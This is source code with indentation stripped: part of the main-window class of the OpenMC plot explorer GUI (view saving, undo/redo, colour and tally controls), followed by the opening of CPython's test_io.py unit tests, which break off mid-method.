"untitled",
"View Settings (*.pltvw)")
if filename:
if "." not in filename:
filename += ".pltvw"
saved = {'version': self.model.version,
'current': self.model.currentView}
with open(filename, 'wb') as file:
pickle.dump(saved, file)
def openView(self):
filename, ext = QFileDialog.getOpenFileName(self, "Open View Settings",
".", "*.pltvw")
if filename:
try:
with open(filename, 'rb') as file:
saved = pickle.load(file)
except Exception:
message = 'Error loading plot settings'
saved = {'version': None,
'current': None}
if saved['version'] == self.model.version:
self.model.activeView = saved['current']
self.dock.updateDock()
self.colorDialog.updateDialogValues()
self.applyChanges()
message = '{} settings loaded'.format(filename)
else:
message = 'Error loading plot settings. Incompatible model.'
self.statusBar().showMessage(message, 5000)
def openStatePoint(self):
# check for an alread-open statepoint
if self.model.statepoint:
msg_box = QMessageBox()
msg_box.setText("Please close the current statepoint file before "
"opening a new one.")
msg_box.setIcon(QMessageBox.Information)
msg_box.setStandardButtons(QMessageBox.Ok)
msg_box.exec_()
return
filename, ext = QFileDialog.getOpenFileName(self, "Open StatePoint",
".", "statepoint*.h5")
if filename:
try:
self.model.openStatePoint(filename)
message = 'Opened statepoint file: {}'
except (FileNotFoundError, OSError):
message = 'Error opening statepoint file: {}'
msg_box = QMessageBox()
msg = "Could not open statepoint file: \n\n {} \n"
msg_box.setText(msg.format(filename))
msg_box.setIcon(QMessageBox.Warning)
msg_box.setStandardButtons(QMessageBox.Ok)
msg_box.exec_()
finally:
self.statusBar().showMessage(message.format(filename), 5000)
self.updateDataMenu()
self.tallyDock.update()
def closeStatePoint(self):
# remove the statepoint object and update the data menu
filename = self.model.statepoint.filename
self.model.statepoint = None
self.model.currentView.selectedTally = None
self.model.activeView.selectedTally = None
msg = "Closed statepoint file {}".format(filename)
self.statusBar().showMessage(msg)
self.updateDataMenu()
self.tallyDock.selectTally()
self.tallyDock.update()
self.plotIm.updatePixmap()
def updateDataMenu(self):
if self.model.statepoint:
self.closeStatePointAction = QAction("&Close statepoint", self)
self.closeStatePointAction.setToolTip("Close current statepoint")
self.closeStatePointAction.triggered.connect(self.closeStatePoint)
self.dataMenu.addAction(self.closeStatePointAction)
elif hasattr(self, "closeStatePointAction"):
self.dataMenu.removeAction(self.closeStatePointAction)
def applyChanges(self):
if self.model.activeView != self.model.currentView:
self.statusBar().showMessage('Generating Plot...')
QApplication.processEvents()
self.model.storeCurrent()
self.model.subsequentViews = []
self.plotIm.generatePixmap()
self.resetModels()
self.showCurrentView()
self.statusBar().showMessage('')
else:
self.statusBar().showMessage('No changes to apply.', 3000)
def undo(self):
self.statusBar().showMessage('Generating Plot...')
QApplication.processEvents()
self.model.undo()
self.resetModels()
self.showCurrentView()
self.dock.updateDock()
self.colorDialog.updateDialogValues()
if not self.model.previousViews:
self.undoAction.setDisabled(True)
self.redoAction.setDisabled(False)
self.statusBar().showMessage('')
def redo(self):
self.statusBar().showMessage('Generating Plot...')
QApplication.processEvents()
self.model.redo()
self.resetModels()
self.showCurrentView()
self.dock.updateDock()
self.colorDialog.updateDialogValues()
if not self.model.subsequentViews:
self.redoAction.setDisabled(True)
self.undoAction.setDisabled(False)
self.statusBar().showMessage('')
def restoreDefault(self):
if self.model.currentView != self.model.defaultView:
self.statusBar().showMessage('Generating Plot...')
QApplication.processEvents()
self.model.storeCurrent()
self.model.activeView.adopt_plotbase(self.model.defaultView)
self.plotIm.generatePixmap()
self.resetModels()
self.showCurrentView()
self.dock.updateDock()
self.colorDialog.updateDialogValues()
self.model.subsequentViews = []
self.statusBar().showMessage('')
def editBasis(self, basis, apply=False):
self.model.activeView.basis = basis
self.dock.updateBasis()
if apply:
self.applyChanges()
def editColorBy(self, domain_kind, apply=False):
self.model.activeView.colorby = domain_kind
self.dock.updateColorBy()
self.colorDialog.updateColorBy()
if apply:
self.applyChanges()
def editUniverseLevel(self, level, apply=False):
if level in ('all', ''):
self.model.activeView.level = -1
else:
self.model.activeView.level = int(level)
self.dock.updateUniverseLevel()
self.colorDialog.updateUniverseLevel()
if apply:
self.applyChanges()
def toggleOverlaps(self, state, apply=False):
self.model.activeView.color_overlaps = bool(state)
self.colorDialog.updateOverlap()
if apply:
self.applyChanges()
def editColorMap(self, colormap_name, property_type, apply=False):
self.model.activeView.colormaps[property_type] = colormap_name
self.plotIm.updateColorMap(colormap_name, property_type)
self.colorDialog.updateColorMaps()
if apply:
self.applyChanges()
def editColorbarMin(self, min_val, property_type, apply=False):
av = self.model.activeView
current = av.user_minmax[property_type]
av.user_minmax[property_type] = (min_val, current[1])
self.colorDialog.updateColorMinMax()
self.plotIm.updateColorMinMax(property_type)
if apply:
self.applyChanges()
def editColorbarMax(self, max_val, property_type, apply=False):
av = self.model.activeView
current = av.user_minmax[property_type]
av.user_minmax[property_type] = (current[0], max_val)
self.colorDialog.updateColorMinMax()
self.plotIm.updateColorMinMax(property_type)
if apply:
self.applyChanges()
def toggleColorbarScale(self, state, property, apply=False):
av = self.model.activeView
av.color_scale_log[property] = bool(state)
# temporary, should be resolved diferently in the future
cv = self.model.currentView
cv.color_scale_log[property] = bool(state)
self.plotIm.updateColorbarScale()
if apply:
self.applyChanges()
def toggleUserMinMax(self, state, property):
av = self.model.activeView
av.use_custom_minmax[property] = bool(state)
if av.user_minmax[property] == (0.0, 0.0):
av.user_minmax[property] = copy.copy(av.data_minmax[property])
self.plotIm.updateColorMinMax('temperature')
self.plotIm.updateColorMinMax('density')
self.colorDialog.updateColorMinMax()
def toggleDataIndicatorCheckBox(self, state, property, apply=False):
av = self.model.activeView
av.data_indicator_enabled[property] = bool(state)
cv = self.model.currentView
cv.data_indicator_enabled[property] = bool(state)
self.plotIm.updateDataIndicatorVisibility()
if apply:
self.applyChanges()
def toggleMasking(self, state, apply=False):
self.model.activeView.masking = bool(state)
self.colorDialog.updateMasking()
if apply:
self.applyChanges()
def toggleHighlighting(self, state, apply=False):
self.model.activeView.highlighting = bool(state)
self.colorDialog.updateHighlighting()
if apply:
self.applyChanges()
def toggleDockView(self):
if self.dock.isVisible():
self.dock.hide()
if not self.isMaximized() and not self.dock.isFloating():
self.resize(self.width() - self.dock.width(), self.height())
else:
self.dock.setVisible(True)
if not self.isMaximized() and not self.dock.isFloating():
self.resize(self.width() + self.dock.width(), self.height())
self.resizePixmap()
self.showMainWindow()
def toggleTallyDockView(self):
if self.tallyDock.isVisible():
self.tallyDock.hide()
if not self.isMaximized() and not self.tallyDock.isFloating():
self.resize(self.width() - self.tallyDock.width(), self.height())
else:
self.tallyDock.setVisible(True)
if not self.isMaximized() and not self.tallyDock.isFloating():
self.resize(self.width() + self.tallyDock.width(), self.height())
self.resizePixmap()
self.showMainWindow()
def editZoomAct(self):
percent, ok = QInputDialog.getInt(self, "Edit Zoom", "Zoom Percent:",
self.dock.zoomBox.value(), 25, 2000)
if ok:
self.dock.zoomBox.setValue(percent)
def editZoom(self, value):
self.zoom = value
self.resizePixmap()
self.dock.zoomBox.setValue(value)
def showMainWindow(self):
self.raise_()
self.activateWindow()
def showColorDialog(self):
self.colorDialog.show()
self.colorDialog.raise_()
self.colorDialog.activateWindow()
def showExportDialog(self):
self.exportDataDialog.show()
self.exportDataDialog.raise_()
self.exportDataDialog.activateWindow()
# Dock methods:
def editSingleOrigin(self, value, dimension):
self.model.activeView.origin[dimension] = value
def editPlotAlpha(self, value):
self.model.activeView.domainAlpha = value
def editPlotVisibility(self, value):
self.model.activeView.domainVisible = bool(value)
def toggleOutlines(self, value, apply=False):
self.model.activeView.outlines = bool(value)
self.dock.updateOutlines()
if apply:
self.applyChanges()
def editWidth(self, value):
self.model.activeView.width = value
self.onRatioChange()
self.dock.updateWidth()
def editHeight(self, value):
self.model.activeView.height = value
self.onRatioChange()
self.dock.updateHeight()
def toggleAspectLock(self, state):
self.model.activeView.aspectLock = bool(state)
self.onRatioChange()
self.dock.updateAspectLock()
def editVRes(self, value):
self.model.activeView.v_res = value
self.dock.updateVRes()
def editHRes(self, value):
self.model.activeView.h_res = value
self.onRatioChange()
self.dock.updateHRes()
# Color dialog methods:
def editMaskingColor(self):
current_color = self.model.activeView.maskBackground
dlg = QColorDialog(self)
dlg.setCurrentColor(QtGui.QColor.fromRgb(*current_color))
if dlg.exec_():
new_color = dlg.currentColor().getRgb()[:3]
self.model.activeView.maskBackground = new_color
self.colorDialog.updateMaskingColor()
def editHighlightColor(self):
current_color = self.model.activeView.highlightBackground
dlg = QColorDialog(self)
dlg.setCurrentColor(QtGui.QColor.fromRgb(*current_color))
if dlg.exec_():
new_color = dlg.currentColor().getRgb()[:3]
self.model.activeView.highlightBackground = new_color
self.colorDialog.updateHighlightColor()
def editAlpha(self, value):
self.model.activeView.highlightAlpha = value
def editSeed(self, value):
self.model.activeView.highlightSeed = value
def editOverlapColor(self, apply=False):
current_color = self.model.activeView.overlap_color
dlg = QColorDialog(self)
dlg.setCurrentColor(QtGui.QColor.fromRgb(*current_color))
if dlg.exec_():
new_color = dlg.currentColor().getRgb()[:3]
self.model.activeView.overlap_color = new_color
self.colorDialog.updateOverlapColor()
if apply:
self.applyChanges()
def editBackgroundColor(self, apply=False):
current_color = self.model.activeView.domainBackground
dlg = QColorDialog(self)
dlg.setCurrentColor(QtGui.QColor.fromRgb(*current_color))
if dlg.exec_():
new_color = dlg.currentColor().getRgb()[:3]
self.model.activeView.domainBackground = new_color
self.colorDialog.updateBackgroundColor()
if apply:
self.applyChanges()
def resetColors(self):
self.model.resetColors()
self.colorDialog.updateDialogValues()
self.applyChanges()
# Tally dock methods
def editSelectedTally(self, event):
av = self.model.activeView
if event is None or event == "None" or event == "":
av.selectedTally = None
else:
av.selectedTally = int(event.split()[1])
self.tallyDock.selectTally(event)
def editTallyValue(self, event):
av = self.model.activeView
av.tallyValue = event
def updateScores(self, state):
self.tallyDock.updateScores()
def updateNuclides(self, state):
self.tallyDock.updateNuclides()
def toggleTallyVisibility(self, state, apply=False):
av = self.model.activeView
av.tallyDataVisible = bool(state)
if apply:
self.applyChanges()
def toggleTallyLogScale(self, state, apply=False):
av = self.model.activeView
av.tallyDataLogScale = bool(state)
if apply:
self.applyChanges()
def toggleTallyMaskZero(self, state):
av = self.model.activeView
av.tallyMaskZeroValues = bool(state)
def editTallyAlpha(self, value, apply=False):
av = self.model.activeView
av.tallyDataAlpha = value
if apply:
self.applyChanges()
def toggleTallyContours(self, state):
av = self.model.activeView
av.tallyContours = bool(state)
def editTallyContourLevels(self, value):
av = self.model.activeView
av.tallyContourLevels = value
def toggleTallyDataIndicator(self, state, apply=False):
av = self.model.activeView
av.tallyDataIndicator = bool(state)
if apply:
self.applyChanges()
def toggleTallyDataClip(self, state):
av = self.model.activeView
av.clipTallyData = bool(state)
def toggleTallyDataUserMinMax(self, state, apply=False):
av = self.model.activeView
av.tallyDataUserMinMax = bool(state)
self.tallyDock.tallyColorForm.setMinMaxEnabled(bool(state))
if apply:
self.applyChanges()
def editTallyDataMin(self, value, apply=False):
av = self.model.activeView
av.tallyDataMin = value
if apply:
self.applyChanges()
def editTallyDataMax(self, value, apply=False):
av = self.model.activeView
av.tallyDataMax = value
if apply:
self.applyChanges()
def editTallyDataColormap(self, cmap, apply=False):
av = self.model.activeView
av.tallyDataColormap = cmap
if apply:
self.applyChanges()
def updateTallyMinMax(self):
self.tallyDock.updateMinMax()
# Plot image methods
def editPlotOrigin(self, xOr, yOr, zOr=None, apply=False):
if zOr is not None:
self.model.activeView.origin = [xOr, yOr, zOr]
else:
origin = [None, None, None]
origin[self.xBasis] = xOr
origin[self.yBasis] = yOr
origin[self.zBasis] = self.model.activeView.origin[self.zBasis]
self.model.activeView.origin = origin
self.dock.updateOrigin()
if apply:
self.applyChanges()
def revertDockControls(self):
self.dock.revertToCurrent()
def editDomainColor(self, kind, id):
if kind == 'Cell':
domain = self.model.activeView.cells
else:
domain = self.model.activeView.materials
current_color = domain[id].color
dlg = QColorDialog(self)
if isinstance(current_color, tuple):
dlg.setCurrentColor(QtGui.QColor.fromRgb(*current_color))
elif isinstance(current_color, str):
current_color = openmc.plots._SVG_COLORS[current_color]
dlg.setCurrentColor(QtGui.QColor.fromRgb(*current_color))
if dlg.exec_():
new_color = dlg.currentColor().getRgb()[:3]
domain[id].color = new_color
self.applyChanges()
def toggleDomainMask(self, state, kind, id):
if kind == 'Cell':
domain = self.model.activeView.cells
else:
domain = self.model.activeView.materials
domain[id].masked = bool(state)
self.applyChanges()
def toggleDomainHighlight(self, state, kind, id):
if kind == 'Cell':
domain = self.model.activeView.cells
else:
domain = self.model.activeView.materials
domain[id].highlight = bool(state)
self.applyChanges()
# Helper methods:
def restoreWindowSettings(self):
settings = QtCore.QSettings()
self.resize(settings.value("mainWindow/Size",
QtCore.QSize(800, 600)))
self.move(settings.value("mainWindow/Position",
QtCore.QPoint(100, 100)))
self.restoreState(settings.value("mainWindow/State"))
self.colorDialog.resize(settings.value("colorDialog/Size",
QtCore.QSize(400, 500)))
self.colorDialog.move(settings.value("colorDialog/Position",
QtCore.QPoint(600, 200)))
is_visible = settings.value("colorDialog/Visible", 0)
# some versions of PySide will return None rather than the default value
if is_visible is None:
is_visible = False
else:
is_visible = bool(int(is_visible))
self.colorDialog.setVisible(is_visible)
def restoreModelSettings(self):
if os.path.isfile("plot_settings.pkl"):
with open('plot_settings.pkl', 'rb') as file:
model = pickle.load(file)
# do not replace model if the version is out of date
if model.version != self.model.version:
print("WARNING: previous plot settings are for a different "
"version of the GUI. They will be ignored.")
wrn_msg = "Existing version: {}, Current GUI version: {}"
print(wrn_msg.format(model.version, self.model.version))
return
try:
self.model.statepoint = model.statepoint
except OSError:
msg_box = QMessageBox()
msg = "Could not open statepoint file: \n\n {} \n"
msg_box.setText(msg.format(self.model.statepoint.filename))
msg_box.setIcon(QMessageBox.Warning)
msg_box.setStandardButtons(QMessageBox.Ok)
msg_box.exec_()
self.model.statepoint = None
self.model.currentView = model.currentView
self.model.activeView = copy.deepcopy(model.currentView)
self.model.previousViews = model.previousViews
self.model.subsequentViews = model.subsequentViews
def resetModels(self):
self.cellsModel = DomainTableModel(self.model.activeView.cells)
self.materialsModel = DomainTableModel(self.model.activeView.materials)
self.cellsModel.beginResetModel()
self.cellsModel.endResetModel()
self.materialsModel.beginResetModel()
self.materialsModel.endResetModel()
self.colorDialog.updateDomainTabs()
def showCurrentView(self):
self.updateScale()
self.updateRelativeBases()
self.plotIm.updatePixmap()
if self.model.previousViews:
self.undoAction.setDisabled(False)
if self.model.subsequentViews:
self.redoAction.setDisabled(False)
else:
self.redoAction.setDisabled(True)
self.adjustWindow()
def updateScale(self):
cv = self.model.currentView
self.scale = (cv.h_res / cv.width,
cv.v_res / cv.height)
def updateRelativeBases(self):
cv = self.model.currentView
self.xBasis = 0 if cv.basis[0] == 'x' else 1
self.yBasis = 1 if cv.basis[1] == 'y' else 2
self.zBasis = 3 - (self.xBasis + self.yBasis)
def adjustWindow(self):
self.setMaximumSize(self.screen.width(), self.screen.height())
def onRatioChange(self):
av = self.model.activeView
if av.aspectLock:
ratio = av.width / max(av.height, .001)
av.v_res = int(av.h_res / ratio)
self.dock.updateVRes()
def showCoords(self, xPlotPos, yPlotPos):
cv = self.model.currentView
if cv.basis == 'xy':
coords = ("({}, {}, {})".format(round(xPlotPos, 2),
round(yPlotPos, 2),
round(cv.origin[2], 2)))
elif cv.basis == 'xz':
coords = ("({}, {}, {})".format(round(xPlotPos, 2),
round(cv.origin[1], 2),
round(yPlotPos, 2)))
else:
coords = ("({}, {}, {})".format(round(cv.origin[0], 2),
round(xPlotPos, 2),
round(yPlotPos, 2)))
self.coord_label.setText('{}'.format(coords))
def resizePixmap(self):
self.plotIm._resize()
self.plotIm.adjustSize()
def moveEvent(self, event):
self.adjustWindow()
def resizeEvent(self, event):
self.plotIm._resize()
self.adjustWindow()
self.updateScale()
if self.shortcutOverlay.isVisible():
self.shortcutOverlay.resize(self.width(), self.height())
def closeEvent(self, event):
settings = QtCore.QSettings()
settings.setValue("mainWindow/Size", self.size())
settings.setValue("mainWindow/Position", self.pos())
settings.setValue("mainWindow/State", self.saveState())
settings.setValue("colorDialog/Size", self.colorDialog.size())
settings.setValue("colorDialog/Position", self.colorDialog.pos())
visible = int(self.colorDialog.isVisible())
settings.setValue("colorDialog/Visible", visible)
openmc.lib.finalize()
self.saveSettings()
def saveSettings(self):
if len(self.model.previousViews) > 10:
self.model.previousViews = self.model.previousViews[-10:]
if len(self.model.subsequentViews) > 10:
self.model.subsequentViews = self.model.subsequentViews[-10:]
with open('plot_settings.pkl', 'wb') as file:
if self.model.statepoint:
self.model.statepoint.close()
pickle.dump(self.model, file)
def exportTallyData(self):
# show export tool dialog
self.showExportDialog()
|
test_io.py
|
"""Unit tests for the io module."""
# Tests of io are scattered over the test suite:
# * test_bufio - tests file buffering
# * test_memoryio - tests BytesIO and StringIO
# * test_fileio - tests FileIO
# * test_file - tests the file interface
# * test_io - tests everything else in the io module
# * test_univnewlines - tests universal newline support
# * test_largefile - tests operations on a file greater than 2**32 bytes
# (only enabled with -ulargefile)
################################################################################
# ATTENTION TEST WRITERS!!!
################################################################################
# When writing tests for io, it's important to test both the C and Python
# implementations. This is usually done by writing a base test that refers to
# the type it is testing as an attribute. Then it provides custom subclasses to
# test both implementations. This file has lots of examples.
################################################################################
import abc
import array
import errno
import locale
import os
import pickle
import random
import signal
import sys
import time
import unittest
import warnings
import weakref
from collections import deque, UserList
from itertools import cycle, count
from test import support
from test.support.script_helper import assert_python_ok, run_python_until_end
import codecs
import io # C implementation of io
import _pyio as pyio # Python implementation of io
try:
import threading
except ImportError:
threading = None
def _default_chunk_size():
"""Get the default TextIOWrapper chunk size"""
with open(__file__, "r", encoding="latin-1") as f:
return f._CHUNK_SIZE
class MockRawIOWithoutRead:
"""A RawIO implementation without read(), so as to exercise the default
RawIO.read() which calls readinto()."""
def __init__(self, read_stack=()):
self._read_stack = list(read_stack)
self._write_stack = []
self._reads = 0
self._extraneous_reads = 0
def write(self, b):
self._write_stack.append(bytes(b))
return len(b)
def writable(self):
return True
def fileno(self):
return 42
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence):
return 0 # wrong but we gotta return something
def tell(self):
return 0 # same comment as above
def readinto(self, buf):
self._reads += 1
max_len = len(buf)
try:
data = self._read_stack[0]
except IndexError:
self._extraneous_reads += 1
return 0
if data is None:
del self._read_stack[0]
return None
n = len(data)
if len(data) <= max_len:
del self._read_stack[0]
buf[:n] = data
return n
else:
buf[:] = data[:max_len]
self._read_stack[0] = data[max_len:]
return max_len
def truncate(self, pos=None):
return pos
class CMockRawIOWithoutRead(MockRawIOWithoutRead, io.RawIOBase):
pass
class PyMockRawIOWithoutRead(MockRawIOWithoutRead, pyio.RawIOBase):
pass
class MockRawIO(MockRawIOWithoutRead):
def read(self, n=None):
self._reads += 1
try:
return self._read_stack.pop(0)
except:
self._extraneous_reads += 1
return b""
class CMockRawIO(MockRawIO, io.RawIOBase):
pass
class PyMockRawIO(MockRawIO, pyio.RawIOBase):
pass
class MisbehavedRawIO(MockRawIO):
def write(self, b):
return super().write(b) * 2
def read(self, n=None):
return super().read(n) * 2
def seek(self, pos, whence):
return -123
def tell(self):
return -456
def readinto(self, buf):
super().readinto(buf)
return len(buf) * 5
class CMisbehavedRawIO(MisbehavedRawIO, io.RawIOBase):
pass
class PyMisbehavedRawIO(MisbehavedRawIO, pyio.RawIOBase):
pass
class CloseFailureIO(MockRawIO):
closed = 0
def close(self):
if not self.closed:
self.closed = 1
raise OSError
class CCloseFailureIO(CloseFailureIO, io.RawIOBase):
pass
class PyCloseFailureIO(CloseFailureIO, pyio.RawIOBase):
pass
class MockFileIO:
def __init__(self, data):
self.read_history = []
super().__init__(data)
def read(self, n=None):
res = super().read(n)
self.read_history.append(None if res is None else len(res))
return res
def readinto(self, b):
res = super().readinto(b)
self.read_history.append(res)
return res
class CMockFileIO(MockFileIO, io.BytesIO):
pass
class PyMockFileIO(MockFileIO, pyio.BytesIO):
pass
class MockUnseekableIO:
def seekable(self):
return False
def seek(self, *args):
raise self.UnsupportedOperation("not seekable")
def tell(self, *args):
raise self.UnsupportedOperation("not seekable")
class CMockUnseekableIO(MockUnseekableIO, io.BytesIO):
UnsupportedOperation = io.UnsupportedOperation
class PyMockUnseekableIO(MockUnseekableIO, pyio.BytesIO):
UnsupportedOperation = pyio.UnsupportedOperation
class MockNonBlockWriterIO:
def __init__(self):
self._write_stack = []
self._blocker_char = None
def pop_written(self):
s = b"".join(self._write_stack)
self._write_stack[:] = []
return s
def block_on(self, char):
"""Block when a given char is encountered."""
self._blocker_char = char
def readable(self):
return True
def seekable(self):
return True
def writable(self):
return True
def write(self, b):
b = bytes(b)
n = -1
if self._blocker_char:
try:
n = b.index(self._blocker_char)
except ValueError:
pass
else:
if n > 0:
# write data up to the first blocker
self._write_stack.append(b[:n])
return n
else:
# cancel blocker and indicate would block
self._blocker_char = None
return None
self._write_stack.append(b)
return len(b)
class CMockNonBlockWriterIO(MockNonBlockWriterIO, io.RawIOBase):
BlockingIOError = io.BlockingIOError
class PyMockNonBlockWriterIO(MockNonBlockWriterIO, pyio.RawIOBase):
BlockingIOError = pyio.BlockingIOError
class IOTest(unittest.TestCase):
def setUp(self):
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def write_ops(self, f):
self.assertEqual(f.write(b"blah."), 5)
f.truncate(0)
self.assertEqual(f.tell(), 5)
f.seek(0)
self.assertEqual(f.write(b"blah."), 5)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"Hello."), 6)
self.assertEqual(f.tell(), 6)
self.assertEqual(f.seek(-1, 1), 5)
self.assertEqual(f.tell(), 5)
self.assertEqual(f.write(bytearray(b" world\n\n\n")), 9)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"h"), 1)
self.assertEqual(f.seek(-1, 2), 13)
self.assertEqual(f.tell(), 13)
self.assertEqual(f.truncate(12), 12)
self.assertEqual(f.tell(), 13)
self.assertRaises(TypeError, f.seek, 0.0)
def read_ops(self, f, buffered=False):
data = f.read(5)
self.assertEqual(data, b"hello")
data = bytearray(data)
self.assertEqual(f.readinto(data), 5)
self.assertEqual(data, b" worl")
self.assertEqual(f.readinto(data), 2)
self.assertEqual(len(data), 5)
self.assertEqual(data[:2], b"d\n")
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(20), b"hello world\n")
self.assertEqual(f.read(1), b"")
self.assertEqual(f.readinto(bytearray(b"x")), 0)
self.assertEqual(f.seek(-6, 2), 6)
self.assertEqual(f.read(5), b"world")
self.assertEqual(f.read(0), b"")
self.assertEqual(f.readinto(bytearray()), 0)
self.assertEqual(f.seek(-6, 1), 5)
self.assertEqual(f.read(5), b" worl")
self.assertEqual(f.tell(), 10)
self.assertRaises(TypeError, f.seek, 0.0)
if buffered:
f.seek(0)
self.assertEqual(f.read(), b"hello world\n")
f.seek(6)
self.assertEqual(f.read(), b"world\n")
self.assertEqual(f.read(), b"")
LARGE = 2**31
def large_file_ops(self, f):
assert f.readable()
assert f.writable()
self.assertEqual(f.seek(self.LARGE), self.LARGE)
self.assertEqual(f.tell(), self.LARGE)
self.assertEqual(f.write(b"xxx"), 3)
self.assertEqual(f.tell(), self.LARGE + 3)
self.assertEqual(f.seek(-1, 1), self.LARGE + 2)
self.assertEqual(f.truncate(), self.LARGE + 2)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 2)
self.assertEqual(f.truncate(self.LARGE + 1), self.LARGE + 1)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 1)
self.assertEqual(f.seek(-1, 2), self.LARGE)
self.assertEqual(f.read(2), b"x")
def test_invalid_operations(self):
# Try writing on a file opened in read mode and vice-versa.
exc = self.UnsupportedOperation
for mode in ("w", "wb"):
with self.open(support.TESTFN, mode) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(support.TESTFN, "wb", buffering=0) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(support.TESTFN, "rb", buffering=0) as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "rb") as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "r") as fp:
self.assertRaises(exc, fp.write, "blah")
self.assertRaises(exc, fp.writelines, ["blah\n"])
# Non-zero seeking from current or end pos
self.assertRaises(exc, fp.seek, 1, self.SEEK_CUR)
self.assertRaises(exc, fp.seek, -1, self.SEEK_END)
def test_open_handles_NUL_chars(self):
fn_with_NUL = 'foo\0bar'
self.assertRaises(ValueError, self.open, fn_with_NUL, 'w')
self.assertRaises(ValueError, self.open, bytes(fn_with_NUL, 'ascii'), 'w')
def test_raw_file_io(self):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f)
def test_buffered_file_io(self):
with self.open(support.TESTFN, "wb") as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f, True)
def test_readline(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"abc\ndef\nxyzzy\nfoo\x00bar\nanother line")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readline(), b"abc\n")
self.assertEqual(f.readline(10), b"def\n")
self.assertEqual(f.readline(2), b"xy")
self.assertEqual(f.readline(4), b"zzy\n")
self.assertEqual(f.readline(), b"foo\x00bar\n")
self.assertEqual(f.readline(None), b"another line")
self.assertRaises(TypeError, f.readline, 5.3)
with self.open(support.TESTFN, "r") as f:
self.assertRaises(TypeError, f.readline, 5.3)
def test_raw_bytes_io(self):
f = self.BytesIO()
self.write_ops(f)
data = f.getvalue()
self.assertEqual(data, b"hello world\n")
f = self.BytesIO(data)
self.read_ops(f, True)
def test_large_file_ops(self):
# On Windows and Mac OSX this test comsumes large resources; It takes
# a long time to build the >2GB file and takes >2GB of disk space
# therefore the resource must be enabled to run this test.
if sys.platform[:3] == 'win' or sys.platform == 'darwin':
support.requires(
'largefile',
'test requires %s bytes and a long time to run' % self.LARGE)
with self.open(support.TESTFN, "w+b", 0) as f:
self.large_file_ops(f)
with self.open(support.TESTFN, "w+b") as f:
self.large_file_ops(f)
def test_with_open(self):
for bufsize in (0, 1, 100):
f = None
with self.open(support.TESTFN, "wb", bufsize) as f:
f.write(b"xxx")
self.assertEqual(f.closed, True)
f = None
try:
with self.open(support.TESTFN, "wb", bufsize) as f:
1/0
except ZeroDivisionError:
self.assertEqual(f.closed, True)
else:
self.fail("1/0 didn't raise an exception")
# issue 5008
def test_append_mode_tell(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "ab", buffering=0) as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "ab") as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "a") as f:
self.assertGreater(f.tell(), 0)
def test_destructor(self):
record = []
class MyFileIO(self.FileIO):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
with support.check_warnings(('', ResourceWarning)):
f = MyFileIO(support.TESTFN, "wb")
f.write(b"xxx")
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def _check_base_destructor(self, base):
record = []
class MyIO(base):
def __init__(self):
# This exercises the availability of attributes on object
# destruction.
# (in the C version, close() is called by the tp_dealloc
# function, not by __del__)
self.on_del = 1
self.on_close = 2
self.on_flush = 3
def __del__(self):
record.append(self.on_del)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(self.on_close)
super().close()
def flush(self):
record.append(self.on_flush)
super().flush()
f = MyIO()
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_IOBase_destructor(self):
self._check_base_destructor(self.IOBase)
def test_RawIOBase_destructor(self):
self._check_base_destructor(self.RawIOBase)
def test_BufferedIOBase_destructor(self):
self._check_base_destructor(self.BufferedIOBase)
def test_TextIOBase_destructor(self):
self._check_base_destructor(self.TextIOBase)
def test_close_flushes(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def test_array_writes(self):
a = array.array('i', range(10))
n = len(a.tobytes())
with self.open(support.TESTFN, "wb", 0) as f:
self.assertEqual(f.write(a), n)
with self.open(support.TESTFN, "wb") as f:
self.assertEqual(f.write(a), n)
def test_closefd(self):
self.assertRaises(ValueError, self.open, support.TESTFN, 'w',
closefd=False)
def test_read_closed(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
with self.open(support.TESTFN, "r") as f:
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.read(), "egg\n")
file.seek(0)
file.close()
self.assertRaises(ValueError, file.read)
def test_no_closefd_with_filename(self):
# can't use closefd in combination with a file name
self.assertRaises(ValueError, self.open, support.TESTFN, "r", closefd=False)
def test_closefd_attr(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"egg\n")
with self.open(support.TESTFN, "r") as f:
